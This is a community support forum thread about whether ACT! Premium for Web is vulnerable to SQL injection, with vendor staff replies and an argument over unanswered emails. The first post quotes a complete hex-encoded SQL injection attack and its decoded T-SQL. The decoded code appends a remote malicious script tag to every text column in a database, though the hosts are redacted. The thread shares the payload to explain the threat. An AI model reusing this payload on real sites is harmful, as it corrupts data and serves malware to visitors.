Community
Showing results for 
Search instead for 
Do you mean 
Reply

Is APFW vulnerable to SQL Injection?

Accepted Solution Solved
Platinum Elite Contributor
Posts: 14,384
Country: Australia
Accepted Solution

Is APFW vulnerable to SQL Injection?

[ Edited ]

I've asked Sage Australia twice, but haven't had any reply so far

 

If not sure what I mean, see these:
http://en.wikipedia.org/wiki/Sql_injection
http://ppshein.wordpress.com/tag/dos/ - this explains how it works
http://www.dotnetnuke.com:80/Community/Blogs/tabid/825/EntryID/1930/Default.aspx - This one is from the DNN Core team, basically insuring that the framework is secure and to check your legacy modules.  It also provided tools to use to check for vulnerabilities and filters.

-----

In short, it’s something like this. They take a legit query string and add there code to it:

Removed link.
253D&tabid=66&mid=376;DECLARE @S CHAR(4000);SET @S=CAST
(0x4445434C415245204054207661726368617228323535292C404320766172636861
72283430303029204445434C415245205461626C655F437572736F7220435552534F5
220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D20737973
6F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D6
22E696420616E6420612E78747970653D27752720616E642028622E78747970653D39
39206F7220622E78747970653D3335206F7220622E78747970653D323331206F72206
22E78747970653D31363729204F50454E205461626C655F437572736F722046455443
48204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4
043205748494C4528404046455443485F5354415455533D302920424547494E206578
65632827757064617465205B272B40542B275D20736574205B272B40432B275D3D272
7223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F77777730
2E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3
C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C69
6B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2
F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363
726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C6
55F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C65
5F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS
CHAR(4000));EXEC(@S);

The hex code translates into this:
 
DECLARE @T varchar(255)'@C varchar(4000) DECLARE Table_Cursor CURSOR
FOR select a.name'b.name from sysobjects a'syscolumns b where
a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=
231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM  Table_Cursor
INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set
['+@C+']=''"></title><script
src="Removed link.!--''+['+@C+']
where '+@C+' not like ''%"></title><script
src="Removed link.!--''')FETCH NEXT
FROM  Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE
Table_Cursor?
 
The JS script they reference in src=lines are actually viruses. As I have some experience with viruses, I attempted to download the js file to look at it. The file never made it, my gateway antivirus flagged it and killed it each time. So I decided to leave well enough alone.

Message Edited by dlunceford on 10-06-2008 10:21 AM
Message Edited by dlunceford on 10-07-2008 09:59 AM

Accepted Solutions
Solution
Accepted by topic author GLComputing
‎09-25-2015 03:20 AM
Moderator
Posts: 4,395
Country: USA

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

I had a product specialist look into the issue.  He tested with what was available to him with the links you posted along with additional research.

 

View solution in original post


All Replies
Moderator
Posts: 4,395
Country: USA

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

There are currently no reported SQL injection vulnerabilities with ACT! for Web.  If you were able to encounter any vulnerabilities, please let me know.

Platinum Elite Contributor
Posts: 14,384
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

Unfortunately, while there are actual tests you can do (has Sage actually tested them), doing this testing is a bit difficult for me ... I only have one APFW license and I can't justify paying for more installing on a test server.

 

I did ask Sage Australia for some licenses to test this with, but they don't respond to my emails.

Tuned Listener
Posts: 17
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

Who Exactly at Sage Australia did you ask these questions?

Solution
Accepted by topic author GLComputing
‎09-25-2015 03:20 AM
Moderator
Posts: 4,395
Country: USA

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

I had a product specialist look into the issue.  He tested with what was available to him with the links you posted along with additional research.

 

Platinum Elite Contributor
Posts: 14,384
Country: Australia

Re: Is APFW vulnerable to SQL Injection?


ACT2112 wrote:

Mike,

 

Who Exactly at Sage Australia did you ask these questions?


 

I sent email to Kurt and Ken, twice

Platinum Elite Contributor
Posts: 14,384
Country: Australia

Re: Is APFW vulnerable to SQL Injection?


dlunceford wrote:

Mike,

 

I had a product specialist look into the issue.  He tested with what was available to him with the links you posted along with additional research.

 


Thanks David

Tuned Listener
Posts: 17
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

I have checked with Ken, neither one of us received a email regarding this issue from you.

 

Can you tell me when you sent it? Or can you resend it to me

 

As far as licenses go for testing, you would need to buy them or become a ACC which would give you 5 licenses for testing purposes.

 

Thanks

Platinum Elite Contributor
Posts: 14,384
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

I sent the email 10:53 on the 25th of Sept and again at 14:05 on the 30th.

 

I assume you're Kurt? You didn't say in your sig and you aren't using a Sage icon as other Sage staff do.

 

As to buying licenses to do testing, if Sage want me to do unplaid testing, they would at least supply the licenses. As it stands, I'll let Sage staff do the testing

Tuned Listener
Posts: 17
Country: Australia

Re: Is APFW vulnerable to SQL Injection?

Mike,

 

Yes its Kurt,

 

I keep every email that I receive from you, and I don't have either one from the dates you mentioned, I also checked Kens email and there not in his inbox either.

 

Mike you make a very strong accusation in your earlier post that we don't respond to your emails.

 

"I did ask Sage Australia for some licenses to test this with, but they don't respond to my emails"

 

Mike this is a problem for me as I make sure all of your emails get answered,

 

Please forward these emails to me so I can make sure the problem gets rectified.

 

Thanks,